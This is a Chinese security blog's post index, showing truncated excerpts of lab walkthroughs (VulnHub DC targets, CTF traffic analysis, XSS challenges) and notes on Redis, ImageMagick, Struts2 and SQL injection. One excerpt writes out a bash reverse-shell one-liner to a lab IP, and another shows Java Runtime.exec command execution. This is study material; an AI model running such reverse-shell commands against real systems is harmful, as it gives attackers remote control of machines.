- 博客(70)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 Java命令执行浅析
Java命令执行浅析一、JAVA执行命令的几种方式1、java.lang.RuntimeRuntime.getRuntime().exec("calc");Runtime.getRuntime().exec(new String[]{"cmd", "/c", "whoami"});[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cppOaxie-1604401873787)(D:\Users\sangfor\Desktop\JAVA命令执行\image-20201
2020-11-03 20:17:14
1783
原创 Docker简单操作命令总结
本地环境:CentOS 7基础命令查看docker版本docker -v设置国内镜像源cat /etc/docker/daemon.json # 默认为空 {}#添加任意一个国内镜像地址{ "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn"]}启动、停...
2020-04-13 17:02:30
664
原创 Mybatis入门小案例
环境:win10 IDEA项目结构类型:Maven简要介绍:通过Mybatis框架,实现sql语句的查询1. 创建Maven工程选择Maven工程创建next,Groupld为组织名称,自定义,Artifactld为项目名称,命名为Mybatis_Project,其余默认,一直next。在新打开的窗口右下下选择允许导入...
2020-03-25 18:54:13
695
2
原创 GrimTheRipper 靶机
下载地址配置的环境:kali:192.168.25.131 GrimTheRipper 靶机 和 kali 在同一C段开搞nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机192.168.25.135,判定为GrimTheRipper 靶机 ,继续使用nmap获取详细信息nmap -A...
2020-03-09 22:19:15
399
原创 DC9-靶机
前言:2020年一言难尽,我的博客也断了俩月,反思了一下,主要还是懈怠了,每个月最后一天才混一篇博客,宁愿躺着发呆也不想学习。。。这不是个好兆头,所以这次把DC9这个靶机补完,也顺便立下个flag,一个月产出一篇博客是最低要求(没有任何理由),争取2020后半年越来来好~下载地址配置的环境:kali:192.168.25.131 DC9-靶机 和 kal...
2020-03-01 18:37:08
2102
2
原创 DC8-靶机
下载地址配置的环境:kali:192.168.25.131 DC8-靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息nmap -A -p 1-65535 192.168.25...
2019-12-22 17:41:37
2255
原创 DC7-靶机
下载地址下面是作者的一些提示,和爆破无关,需要Google~~~配置的环境:kali:192.168.25.131 DC7-靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
2019-11-30 22:03:16
1642
原创 DC6-靶机
下载地址下面是作者的提示,和爆破的字典有关cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt配置的环境:kali:192.168.25.131 DC6-靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/...
2019-10-30 23:29:45
1640
原创 BugkuCTF(old)----流量分析题目Writeup
flag被盗文件不是很大,粗略看了一下,发现了shell.php字段筛选为http流量,追踪TCP查看直接得到flagflag{This_is_a_f10g}中国菜刀下载解压得到数据包,比较小只有7kb只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包使用kali集成的 binwa...
2019-09-26 17:51:40
1715
原创 Redis数据类型及其部分操作笔记
数据结构1. redis是key-value的数据结构,每条数据都是一个键值对2. 键的类型是字符串(键不能重复)3. 值的类型有五种:字符串string 哈希hash(key-value形式存储) 列表list(存储元素只能为字符串) 集合set (无序,存储的元素不能重复) 有序集合zset (根据对应权重,默认从小到大排列) 如下图所示:...
2019-09-25 10:10:32
195
原创 实验吧杂项-流量日志分析
A记录数据包题目描述如下:下载下来是一个cap文件,用wireshark打开,提示文件截断观察流量发现为无线流量,加上之前的报错,猜测为已加密的数据包破解加密的无线数据包需要得到数据包的 ESSID 和 PASSWORD使用Kali集成的aircrack-ng 爆破工具得到ESSID为 0719 加密方式为 WPA加密(脆弱)加载字典...
2019-09-11 14:53:20
1214
原创 DC5-靶机
下载地址作者已经做了一个提示视频,地址配置的环境:kali:192.168.25.131 DC5-靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机192.168.25.135,判定为DC3-靶机,继续使用nmap获取详细信息nmap -A -p 1...
2019-08-29 15:43:09
2134
原创 DC4-靶机
下载地址配置的环境:kali:192.168.25.131 DC4 -靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机192.168.25.134,判定为DC3-靶机,继续使用nmap获取详细信息nmap -A -p 1-65535 192.168.2...
2019-08-25 17:29:39
3356
原创 DC3-靶机
下载地址这块填一下坑,上面那个链接有两个下载地址,本人是使用VMware虚拟机,下了第一个ova的导入,使用nmap扫,怎么也扫不到存活主机,一直以为是我本地环境的问题,最后没招了,准备重新下一个试试,然后到下载页面一看,作者已经被反馈过这个问题了,又做了一个新的VMware镜像,可以直接使用。 坑啊! 所以使用VMware的同学,下载第二个即可。配置的环境:kali : 192.16...
2019-08-22 18:20:10
4061
5
原创 Python 私有属性和名字重整、魔法属性和方法、上下文管理器
修改、查看私有属性、名字重整如下,Test类定义 一个私有属性 __name 实例化一个对象 a ,无法调用该属性,打印 a.__dict__(可以检查一个对象的所有属性)查看,发现__name存在并且名字变为 _Test__name (无法调用的原因,名字被改变)改变规则:私有属性前添加类名,再在类名前添加一个下划线 (名字重整)我们验证一下,打印修改后的属性,如下...
2019-08-20 10:42:20
482
原创 DC2-靶机
下载地址我配置的环境:kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段渗透nmap扫描网段,发现存活主机nmap -sP 192.168.25.0/24发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息nmap -A -p 1-65535 192.1...
2019-08-19 17:54:15
1701
原创 Python 类对象和实例对象访问属性的区别、property属性
类对象、实例对象、类属性、实例属性下面的一个小demo,定义了一个省份类Province ,即类对象 Province ,开辟了一块内存空间,空间中存放着 类属性 country 和 __init__()方法 。继续创建了一个实例对象 obj ,又开辟了一块新的内存空间(创建实例化对象时,会首先调用 __new__()方法,开辟空间,然后调用__init__()方法,对刚分配的内存空间...
2019-08-11 22:01:35
1858
原创 Python 协程
使用yield完成多任务 yield --------- 可以让一个函数暂停执行,并且每次调用的值依旧保存,下次调用可以继续使用(原理)下面的一个小demo,在一个进程和一个线程的情况下,通过yield实现了两个函数并发执行,占用资源比 多进程,多线程 均少#!/usr/bin/env python# _*_ coding:utf-8 _*_import timede...
2019-08-11 10:09:55
195
原创 python 迭代器与生成器
迭代器迭代是访问集合元素的一种方式,迭代器是一个可以记住遍历的位置的对象。迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束,迭代器只能往前不会后退。可迭代对象我们已经知道可以对list、tuple、str等类型的数据使用 for...in... 的循环语法从其中依次拿到数据进行使用,我们把这样的过程称为遍历,也叫迭代。判断一个东西是否可以迭代,导入...
2019-08-04 23:02:07
353
原创 DC1-靶机
环境搭建DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件)配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段)靶机开机后是一个登陆页面,无法得知ip环境kali:192.1...
2019-07-31 20:45:25
9392
2
原创 Python 方法解析顺序表MRO(多继承)
多继承以及MRO顺序下例中,Son1类和Son2类继承Partent类,Grandson类同时继承Son1类和Son2类,均重写了init方法(Python中重载并不多)在子类中,调用父类init方法,使用 父类名+方法名 调用(此时,需要将self当成第一个实参传递,注意参数的不同)1. 单独调用父类的方法# coding=utf-8print("******多继承使用类名...
2019-07-21 23:44:16
368
原创 Python 私有化、import、封装继承多态
私有化默认情况下,Python中的成员函数和成员变量都是公开的(public),在python中没有类似JAVA、C++中public,private等关键词来修饰成员函数和成员变量。在python中定义私有变量只需要在变量名或函数名前加上双前置下划线 ” __ “ ,那么这个函数或变量就是私有的了。 x :公有变量 _x :单前置下划线,私有化属性或方...
2019-07-21 21:08:56
391
原创 Python 直接赋值、深拷贝、浅拷贝
直接赋值首先创建一个列表 a ,然后将 a 赋于 b ,此时 a 和 b 均为[ 11,22 ]此时 b 存在两种可能,可能b 直接 复制了一份 a 开辟了一个新的内存空间,或者b 指向 a 所对应的值在C语言中,是直接开辟新的内存空间,而在python中,b 指向 a 所对应的值验证如下, a 添加 一个元素 ,查看 b 的值是否改变,结果如下(...
2019-06-29 20:09:01
414
原创 XSS Challenges
一个xss练手的小平台 http://xss-quiz.int21h.jp/ 一共19关,每一关根据提示执行js : alert(document.domian);第一关直接插入测试<script>alert(document.domain)</script>第二关直接插入测试,并没有弹框,查看源码,我们需...
2019-06-22 13:13:02
1141
2
原创 MySQL报错注入函数汇总
常用函数字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空concat(str1, str2, str3 ,...)concat_ws('指定分隔符', str1,str2,str3...)开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空group_concat...
2019-06-12 14:11:45
4920
3
原创 git版本管理(笔记)
1. git基本操作1.1git简介产生历史Linus在1991年创建了开源的Linux,从此,Linux系统不断发展,已经成为最大的服务器系统软件了。Linus虽然创建了Linux,但Linux的壮大是靠全世界热心的志愿者参与的,这么多人在世界各地为Linux编写代码,那Linux的代码是如何管理的呢?事实是,在2002年以前,世界各地的志愿者把源代码文件通过diff的方式发...
2019-05-19 23:45:54
437
原创 Linux之bash反弹shell原理浅析
环境攻击机:kali ip:192.168.25.144靶 机:centos ip:192.168.25.142过程kali 监听本地8888端口靶机 centos 写入 反弹shell 的命令bash -i >& /dev/tcp/192.168.25.144/8888 0>&1...
2019-04-07 02:21:26
16556
10
原创 ImageMagick漏洞汇总
ImageMagick一款使用量很广的图片处理程序,许多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等功能本文就简单的做个汇总,细节就概述了CVE-2016-3714— RCEImageMagick流行的原因之一,就是它功能强大,可以处理很多情况,而有一个功能delegate,作用是调用外部的lib来处理文件。调用外部lib就是执行system命令,...
2019-04-05 23:54:37
4488
原创 Shift后门
shift快捷键Windows的粘滞键------C:\windows\system32\sethc.exe,它本是为不方便按组合键的人设计的Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了粘滞键在进程里面我们可以看到这个程序被系统运行了 不过是以我们自己的用户运权限行的但是当我们未登陆系统(停留在登陆界面)...
2019-03-29 23:02:53
2617
原创 PHP执行系统命令函数
命令注入命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻击手段。常见的执行系统命令的函数有system()passthru()exec()shell_exec()popen()proc_open()pcntl_exec()system()...
2019-03-24 18:38:12
20820
1
原创 CVE-2018-11686本地复现与分析
简介FlexPaper<= 2.3.6 (web版)中存在RCE(远程代码执行),构造恶意的payload执行系统命令。FlexPaper FlexPaper是一个开源轻量级的在浏览器上显示各种文档的组件,被设计用来与PDF2SWF一起使用, 使在Flex中显示PDF成为可能,而这个过程并无需PDF软件环境的支持。它可以被当做Flex的库来使用-------...
2019-03-19 12:19:31
1488
原创 SQL注入之利用DNS获取数据
1.SQL注入SQL注入一般分为报错注入和盲注,盲注的又分为布尔盲注和时间盲注。 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易搞挂网站,这时候我们就需要寻找一种快速有效的方法来获取数据。此时我们就可以利用DNS来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用特点:...
2019-03-13 10:50:33
3979
2
原创 Redis未授权访问漏洞利用
Redis是一个开源的高性能的key-value数据库 默认端口6379Redis因配置不当可以未授权访问,攻击者无需认证访问到内部数据,可导致敏感信息泄露漏洞利用:核心就是进行写文件操作 可以获取敏感信息,操作数据库,SSH远程登录,写入webshell环境搭建:kali 2019(攻击机)ip: 192.168.25.137Ubuntu 16.04 (靶机,...
2019-02-28 23:32:08
1792
原创 DNS域传送漏洞
DNS:默认53端口 解析域名域传送漏洞:DNS服务器分为主服务器,备份服务器,缓存服务器。备份服务器需要利用“域传送”从主服务器上copy数据,然后更新自身的数据库,以达到数据同步的目的,这样是为了增加冗余,万一主服务器挂了还有备份服务器顶着。“域传送”漏洞则是由于DNS配置不当,本来只有备份服务器能获得主服务器的数据,由于漏洞导致任意Client都能通过“域传送”获得主服务器的数据...
2019-02-27 10:30:49
1009
原创 MongoDB数据库的使用
基础命令显示所有数据库:show dbs,show databases 使用数据库:use 数据库名(没有该数据库则自动创建)MongoDB 中默认的数据库为 test,如果你没有创建新的数据库,集合将存放在 test 数据库中查看当前的数据库: db...
2019-02-24 19:40:53
373
原创 斗鱼爬虫
练手(xpath和selenium的使用)抓取每个主播的分类,id,标题,人气#!/usr/bin/env python# _*_ coding:utf-8 _*_from selenium import webdriverfrom selenium.webdriver.chrome.options import Optionsimport timeclass Douyu...
2019-02-17 22:31:58
782
原创 S2-045本地复现与分析
环境搭建:win10 eclipes ee struts2.3.20 tomcat8搭建好的环境:链接:https://pan.baidu.com/s/1mChEMcWRlKALdu9Ikce8OQ提取码:uisj漏洞构造条件只需模拟Struts2上传发包即可,所以我简单写了个登录校验来复现此漏洞导入基础jar包放置在项目lib目录下web.xml...
2019-02-15 00:55:15
3516
原创 Hibernate学习笔记(映射)
代码注释简洁易懂,笔记就简略写了,代码已上传链接:https://pan.baidu.com/s/1-GswKfv5WuCwMqK_kkV_cQ 提取码:b41n Hibernate的一对多关联映射 数据表与表之间的关系 一对多:例如,一个部门对于多个员工,一个员工只能属于某个部门 建表原则:在多的一方创建外键指向一的一方的主键 ...
2019-02-13 21:14:10
247
1
原创 Hibernate学习笔记(持久化类、主键、缓存、事务、常用API)
Hibernate概述: Hibernate是一个持久层的ORM的映射框架 ORM(Object Relational Mapping): 对象关系映射,将Java中一个对象与数据库中表建立映射关系,从而操作对象就可以操作表 Hibernate优点: • 简化JDBC的开发 • 性能很好 ...
2019-02-09 19:13:18
332
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人